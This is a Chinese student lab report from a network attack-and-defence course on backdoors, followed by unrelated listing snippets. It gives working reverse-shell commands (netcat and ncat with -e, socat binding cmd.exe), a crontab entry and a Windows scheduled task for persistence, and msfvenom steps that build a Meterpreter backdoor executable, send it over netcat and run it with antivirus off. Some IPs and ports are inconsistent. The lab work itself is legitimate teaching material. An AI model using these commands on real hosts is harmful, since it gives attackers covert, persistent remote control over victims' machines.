2018-2019-220165217《网络对抗技术》exp2后门原理与实践

yequan1 yequan1     2023-03-10     331

关键词:

2018-2019-2 20165217《网络对抗技术》Exp2 后门原理与实践

实验内容

  • 使用netcat获取主机操作Shell,cron启动
  • 使用socat获取主机操作Shell, 任务计划启动
  • 使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
  • 使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
  • 使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell

    基础问题回答

    1.例举你能想到的一个后门进入到你系统中的可能方式?

  • 在下载软件时,常常会有其他的一些下载的选项默认下载,这时就有可能使后门进入到我们的系统。

    2.例举你知道的后门如何启动起来(win及linux)的方式?

  • Windows下通过任务计划、开机自启动、修改注册表项来启动后门程序
  • 远程监听从而反向连接被控主机,发送后门,控制后门启动

    3.Meterpreter有哪些给你映像深刻的功能?

  • 获取摄像头权限进行拍照、录像,获取麦克风权限进行录音以及获取键盘输入

    4.如何发现自己有系统有没有被安装后门?

  • 用电脑所下载的杀毒软件对系统进行检测
  • 查看开机自启动向、注册表项中有无异常

    相关知识

    ncat

  • 是一个底层工具,进行基本的TCP - - UDP数据收发。常被与其他工具结合使用,起到后门的作用。
  • Linux中一般自带ncat,可以使用man netcat或man nc可查看其使用说明
    Win获得Linux Shell

    • windows打开监听:ncat.exe -l -p 5217
    • Linux反弹连接win:nc 172.20.10.2 5217 -e /bin/sh(IP为win IP)
    • windows下获得一个linux shell,可运行任何指令,如ls

    技术图片

  • Linux获得Win Shell

    • Linux运行监听指令:nc -l -p 5217
    • Windows反弹连接Linux:ncat.exe -e cmd.exe - 172.20.10.2 5217(IP为Linux IP)
    • Linux下看到Windows的命令提示
      技术图片
  • 传输数据

    • Windows下监听端口:ncat.exe -l -p 5217
    • Linux下连接到Windows的端口:ncat 172.20.10.2 5217(IP为win IP)
    • 建立连接之后,就可以传输数据
      技术图片
      socat
  • socat是ncat的增强版,它使用的格式是socat [options]
    ,其中两个address是必选项,而options是可选项。
  • socat的基本功能就是建立两个双向的字节流,数据就在其间传输,参数address就是代表了其中的一个方向。所谓流,代表了数据的流向,而数据则可以有许多不同的类型,命令中也就相应需要许多选项对各种不同的类型数据流进行限定与说明。

Meterpreter

  • 具有强大的功能,特别是其socks代理,具体原理参考揭开Meterpreter的神秘面纱
  • 有关参数可以参考MSF,里面有介绍一些后门的生成。
  • 可以使用msfvenom -p windows/meterpreter/reverse_http lhost=172.20.10.2 lport=5217 -f c(IP为Win IP)生成shellcode,注入到可执行文件,执行时回连攻击主机。

    实验步骤

    任务一(使用netcat获取主机操作Shell,cron启动)

  • 这里将kali作为被攻击目标
  • 在Windows下打开命令行,使用ipconfig查看Windows的IP地址为172.20.10.2
    技术图片
  • Windows中使用ncat.exe -l 5217监听5217端口
    技术图片
  • 在Kali中,使用crontab -e指令编辑一条定时任务,选择编辑器时选择"3",在底行插入25 * * * * /bin/netcat 172.20.10.2 5127 -e /bin/sh(意为在每个小时的第30分钟反向连接Windows的5217端口)
    技术图片
  • :wq保存退出配置即生效,可通过crontab -l查看
  • 在系统时间到第25分钟,就发现获得kali shell
    技术图片

    任务二(使用socat获取主机操作Shell, 任务计划启动)

  • win10系统中找到左下角的windows标志:右键-计算机管理-任务计划程序-创建任务
    技术图片
  • 常规中填写任务名称后(任填),触发器-新建新建触发器,然后确定
    技术图片
  • 操作-新建,导入你所下载解压后的socat.exe的路径,在添加参数中填入tcp-listen:5217 exec:cmd.exe,pty,stderr(意为把cmd.exe绑定到端口5217,同时把cmd.exe的stderr重定向到stdout上)
    技术图片
  • 创建完成之后,按Windows+L快捷键锁定计算机,再次打开时,双击任务计划程序库可以发现之前创建的任务已经开始运行
    技术图片
  • 在kali中输入socat - tcp:172.20.10.2:5217(-代表标准的输入输出,第二个流连接到Windows主机的5217端口,IP为windows的IP),接着可以发现已经成功获得一个cmd shell
    技术图片

    任务三(使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell)

  • 在kali中输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.20.10.2 LPORT=5217 -f exe > 20165217_backdoor.exe(IP为kali的IP)生成后门程序20165217_backdoor.exe
  • 在Windows中使用ncat.exe -lv 5217 > 20165217_backdoor.exe查看连接状态
    技术图片
  • kali中输入nc 172.20.10.2 5217 < 20165217_backdoor.exe(此处的IP为Windows的IP)将生成的后门程序传送到Windows主机上
  • 传输成功
    技术图片
    技术图片
  • 此时kali中新打开一个终端,使用msfconsole进入msf控制台
    技术图片
  • 输入use exploit/multi/handler使用监听模块,设置payload
  • 使用和生成后门程序时相同的payload:set payload windows/meterpreter/reverse_tcp
  • set LHOST 192.168.246.128此处为kali的IP(和生成后门程序时指定的IP相同)
  • 端口号也相同:set LPORT 5330
  • 设置完成后,exploit开始监听
    技术图片
  • 在Windows中先使用ctrl+c退出上条命令,在执行:20165217_backdoor.exe(注意电脑的防火墙和杀毒软件要关掉),发现kali获得Windows主机的连接,并且得到了远程控制的shell
    技术图片

网络对抗技术-网络对抗实验二

...国人民公安大学Chinesepeople’ publicsecurityuniversity 网络对抗技术实验报告 实验二网络嗅探与欺骗   学生姓名 郭家俊年级 2014级区队 三区队指导教师 高见  信息技术与网络安全学院2016年... 查看详情

(转)简述生成式对抗网络

 简述生成式对抗网络【转载请注明出处】chenrudan.github.io本文主要阐述了对生成式对抗网络的理解,首先谈到了什么是对抗样本,以及它与对抗网络的关系,然后解释了对抗网络的每个组成部分,再结合算法流程和代码实现... 查看详情

生成对抗网络gan

详解一:GAN完整理论推导和实现详解二:详解生成对抗网络(GAN)原理 查看详情

网络对抗技术实验四

  网络对抗技术实验四  中国人民公安大学Chinesepeople’ publicsecurityuniversity 网络对抗技术实验报告 实验四恶意代码技术   学生姓名魏成豪 年级2014级 区队六区队 指导教师高见 &... 查看详情

网络对抗实验一

...国人民公安大学Chinesepeople’ publicsecurityuniversity 网络对抗技术实验报告 实验一网络侦查与网络扫描   学生姓名李雨辰 年级 2015级区队一区 指导教师高见   信息技术与网络安全学院2017... 查看详情

pytorchnote45生成对抗网络(gan)(代码片段)

PytorchNote45生成对抗网络(GAN)文章目录PytorchNote45生成对抗网络(GAN)GANsDiscriminatorNetworkGeneratorNetwork简单版本的生成对抗网络判别网络生成网络全部笔记的汇总贴:PytorchNote快乐星球2014年,深度学习三巨头... 查看详情

网络对抗技术-网络侦查与网络扫描

...国人民公安大学Chinesepeople’ publicsecurityuniversity 网络对抗技术实验报告 实验一网络侦查与网络扫描   学生姓名赵致远年级 2014级区队 2区指导教师 高见  信息技术与网络安全学院2017年7月7... 查看详情

网络对抗技术-网络侦查与网络扫描

...国人民公安大学Chinesepeople’ publicsecurityuniversity 网络对抗技术实验报告 实验一网络侦查与网络扫描   学生姓名翟一鸣 年级 2014级区队 2区指导教师 高见  信息技术与网络安全学院2017... 查看详情

网络对抗技术-网络侦查与网络扫描

...国人民公安大学Chinesepeople’ publicsecurityuniversity 网络对抗技术实验报告 实验一网络侦查与网络扫描   学生姓名石琳 年级 2014级区队 2区指导教师 高见  信息技术与网络安全学院2017年7... 查看详情

网络对抗技术-网络侦查与网络扫描

...国人民公安大学Chinesepeople’ publicsecurityuniversity 网络对抗技术实验报告 实验一网络侦查与网络扫描   学生姓名袁昊晨 年级 2014级区队 2区指导教师 高见  信息技术与网络安全学院2017... 查看详情

网络对抗技术

...国人民公安大学Chinesepeople’ publicsecurityuniversity 网络对抗技术实验报告 实验四恶意代码技术   学生姓名 陈子锐年级 2014级区队 二区队指导教师 高见  信息技术与网络安全学院2016年11... 查看详情

公安大学网络对抗作业一

    查看详情

pytorch实现简单的生成对抗网络gan

   生成对抗网络(GenerativeAdversarialNetwork,GAN)包括生成网络和对抗网络两部分。生成网络像自动编码器的解码器,能够生成数据,比如生成一张图片。对抗网络用来判断数据的真假,比如是真图片还是假图片,真图片是... 查看详情

网络对抗技术实验一

...国人民公安大学Chinesepeople’ publicsecurityuniversity 网络对抗技术实验报告 实验一网络侦查与网络扫描   学生姓名夏新宇年级2014 区队四区队 指导教师高见   信息技术与网络安全学院2017年7... 查看详情

网络对抗实验二

...国人民公安大学Chinesepeople’ publicsecurityuniversity 网络对抗技术实验报告 实验二网络嗅探与欺骗   学生姓名李雨辰年级2015级 区队一区队 指导教师 高见  信息技术与网络安全学院2018年5月2... 查看详情

网络对抗技术实验一

...国人民公安大学Chinesepeople’ publicsecurityuniversity 网络对抗技术实验报告 实验一网络侦查与网络扫描   学生姓名李培朗 年级 2014级区队 一区队指导教师 高见  信息技术与网络安全学院2... 查看详情

网络对抗技术——实验一

...国人民公安大学Chinesepeople’ publicsecurityuniversity 网络对抗技术实验报告 实验一网络侦查与网络扫描   学生姓名雷浩年级2014级 区队五区指导教师高见   信息技术与网络安全学院2017年7月7日&nbs... 查看详情

网络对抗技术——实验一

...国人民公安大学Chinesepeople’ publicsecurityuniversity 网络对抗技术实验报告 实验一网络侦查与网络扫描   学生姓名王启兆年级2014级 区队五区指导教师高见   信息技术与网络安全学院2017年7月7日&... 查看详情